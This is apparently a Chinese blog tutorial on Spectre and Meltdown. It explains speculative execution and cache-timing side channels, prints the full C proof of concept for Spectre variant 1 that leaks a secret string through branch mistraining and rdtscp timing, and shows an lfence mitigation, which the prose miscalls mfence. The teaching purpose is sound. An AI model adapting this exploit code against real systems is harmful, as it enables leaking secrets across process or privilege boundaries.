Spectre Meltdown attack 攻击原理之 speculative execution

最新推荐文章于 2024-03-03 20:13:10 发布

置顶夏天不热冬天不冷

最新推荐文章于 2024-03-03 20:13:10 发布

阅读量1.8k

点赞数 2

分类专栏：安全文章标签： spectre x86cpu-speculative execution spectre meltdown 漏洞攻击

本文链接：https://blog.csdn.net/chen1540524015/article/details/81813323

版权

安全专栏收录该内容

3 篇文章 1 订阅

订阅专栏

最近比较火的X86 bug， spectre meltdown 以及及其变种，攻击的前提是cpu具有speculative execution 的能力，也就是推测执行的能力。当然现代架构的cpu都具备推测执行的能力了。推测执行的时机有多种，比如在执行分支跳转（jmp）、函数调用（call）时，但是核心就是预取数据。当cpu多次执行一段代码时，就会推测执行，比如说一段代码需要循环执行10次，但是cpu当执行完第10次之后，可能会执行第11次，但是执行第11次的过程中，cpu发现自己做错了，此时就不会commit结果。推测执行，可能产生回滚的动作。

这就要提到一个概念out of order即乱序执行，举个例子吧。假设从北京到济南只有一条高速公路，而且这条高数公路是4车道。此时A,B,C,D同时从北京出发去济南，在北京高速有4个入口，此时A,B,C,D同时上高速，这就是4发射。A,B,C,D在高速上谁前谁后没人在乎，这就是乱序执行。但是到达终点的时候，就出口只有一个入口，即A,B,C,D要排队出。假设顺序是A,B,C,D，只有顺序对了，才正确。为什么在出站的时候要顺序呢？这就涉及到指令之间数据依赖的问题了，本文不做讨论。感兴趣的读者，可以自行去找本计算机体系结构的书来看。乱序执行是导致meltdown的直接原因。

看这个代码块，while(condition){...}，大家都应该知道至于condition为true的时候才会执行循环体的代码。但是从cpu底层来讲，由于乱序执行，判断condition的指令和循环体的代码一部分指令同时发射，即在提交的时候判断condition的指令要先出，如果condition为true，本次执行正确就提交了。如果condition为false就不会提交了。但是在condition为false的情况下，cpu确实执行了循环体的一些代码，这就导致一些数据会到cache中。其它代码就可以去猜cache的数据。如果这些数据是一些敏感数据呢？如果是内核状态下的数据呢？

怎样去猜cache里的数据呢？大家应该知道，cpu在读数据的时候，如果cache里有，就会从cache里拿；如果cache里没有，就从dram里拿。从dram里拿数据花费的时间肯定要比从cache里拿要多。因此判断数据在cache里最好的方法就是判断时间。

下面是一段代码，来猜自己进程的数据，不涉及权限，ring3 猜 ring3的数据，即spectre的一个攻击。如果跨特权级，ring3去猜ring0的数据，即meltdown攻击，原理还要更复杂一点，以后有时间在写。

在windows编译时需要设置为debug模式。猜数据char* secret = "The Magic Words are Squeamish Ossifrage.";

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt", on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

/* sscanf_s only works in MSVC. sscanf should work with other compilers*/
#ifndef _MSC_VER
#define sscanf_s sscanf
#endif

/********************************************************************
Victim code.
********************************************************************/
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };
uint8_t unused2[64];
uint8_t array2[256 * 512];

char* secret = "The Magic Words are Squeamish Ossifrage.";

uint8_t temp = 0; /* Used so compiler won't optimize out victim_function() */

void victim_function(size_t x)
{
	if (x < array1_size)
	{
		temp &= array2[array1[x] * 512];
	}
}

/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */

/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2])
{
	static int results[256];
	int tries, i, j, k, mix_i;
	unsigned int junk = 0;
	size_t training_x, x;
	register uint64_t time1, time2;
	volatile uint8_t* addr;

	for (i = 0; i < 256; i++)
		results[i] = 0;
	for (tries = 999; tries > 0; tries--)
	{
		/* Flush array2[256*(0..255)] from cache */
		for (i = 0; i < 256; i++)
			_mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */

										   /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
		training_x = tries % array1_size;
		for (j = 29; j >= 0; j--)
		{
			_mm_clflush(&array1_size);
			for (volatile int z = 0; z < 100; z++)
			{
			} /* Delay (can also mfence) */

			  /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
			  /* Avoid jumps in case those tip off the branch predictor */
			x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
			x = (x | (x >> 16)); /* Set x=-1 if j%6=0, else x=0 */
			x = training_x ^ (x & (malicious_x ^ training_x));

			/* Call the victim! */
			victim_function(x);
		}

		/* Time reads. Order is lightly mixed up to prevent stride prediction */
		for (i = 0; i < 256; i++)
		{
			mix_i = ((i * 167) + 13) & 255;
			addr = &array2[mix_i * 512];
			time1 = __rdtscp(&junk); /* READ TIMER */
			junk = *addr; /* MEMORY ACCESS TO TIME */
			time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
			if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
				results[mix_i]++; /* cache hit - add +1 to score for this value */
		}

		/* Locate highest & second-highest results results tallies in j/k */
		j = k = -1;
		for (i = 0; i < 256; i++)
		{
			if (j < 0 || results[i] >= results[j])
			{
				k = j;
				j = i;
			}
			else if (k < 0 || results[i] >= results[k])
			{
				k = i;
			}
		}
		if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
			break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
	}
	results[0] ^= junk; /* use junk so code above won't get optimized out*/
	value[0] = (uint8_t)j;
	score[0] = results[j];
	value[1] = (uint8_t)k;
	score[1] = results[k];
}

int main(int argc, const char* * argv)
{
	printf("Putting '%s' in memory, address %p\n", secret, (void *)(secret));
	size_t malicious_x = (size_t)(secret - (char *)array1); /* default for malicious_x */
	int score[2], len = strlen(secret);
	uint8_t value[2];

	for (size_t i = 0; i < sizeof(array2); i++)
		array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
	if (argc == 3)
	{
		sscanf_s(argv[1], "%p", (void * *)(&malicious_x));
		malicious_x -= (size_t)array1; /* Convert input value into a pointer */
		sscanf_s(argv[2], "%d", &len);
		printf("Trying malicious_x = %p, len = %d\n", (void *)malicious_x, len);
	}

	printf("Reading %d bytes:\n", len);
	while (--len >= 0)
	{
		printf("Reading at malicious_x = %p ... ", (void *)malicious_x);
		readMemoryByte(malicious_x++, value, score);
		printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
		printf("0x%02X='%c' score=%d ", value[0],
			(value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
		if (score[1] > 0)
			printf("(second best: 0x%02X='%c' score=%d)", value[1],
			(value[1] > 31 && value[1] < 127 ? value[1] : '?'),
				score[1]);
		printf("\n");
	}
#ifdef _MSC_VER
	printf("Press ENTER to exit\n");
	getchar();	/* Pause Windows console */
#endif
	return (0);
}

运行结果：

代码分析：

做越界访问的代码段为

void victim_function(size_t x)
{
   if (x < array1_size)
   {
       temp &= array2[array1[x] * 512];
   }
}

猜cache数据的代码：

/* Time reads. Order is lightly mixed up to prevent stride prediction */
       for (i = 0; i < 256; i++)
       {
           mix_i = ((i * 167) + 13) & 255;
           addr = &array2[mix_i * 512];
           time1 = __rdtscp(&junk); /* READ TIMER */
           junk = *addr; /* MEMORY ACCESS TO TIME */
           time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
           if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
               results[mix_i]++; /* cache hit - add +1 to score for this value */
       }

       /* Locate highest & second-highest results results tallies in j/k */
       j = k = -1;
       for (i = 0; i < 256; i++)
       {
           if (j < 0 || results[i] >= results[j])
           {
               k = j;
               j = i;
           }
           else if (k < 0 || results[i] >= results[k])
           {
               k = i;
           }
       }
       if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
           break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */

怎样预防这种攻击呢？只需要在关键的地方不让cpu乱序执行就可以了，加一条串行化的指令，mfence就可以了。

void victim_function(size_t x)
{
   if (x < array1_size)
   {
       _mm_lfence();
       temp &= array2[array1[x] * 512];
   }

}

执行结果：

代码 github : https://github.com/Tinycl/spectre-attack

夏天不热冬天不冷

关注

2
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
Spectre Meltdown attack 攻击原理之 speculative execution

最近比较火的X86 bug， spectre meltdown 以及及其变种，攻击的前提是cpu具有speculative execution 的能力，也就是推测执行的能力。当然现代架构的cpu都具备推测执行的能力了。推测执行的时机有多种，比如在执行分支跳转（jmp）、函数调用（call）时，但是核心就是预取数据。当cpu多次执行一段代码时，就会推测执行，比如说一段代码需要循环执行10次，但是cp...
复制链接

扫一扫

专栏目录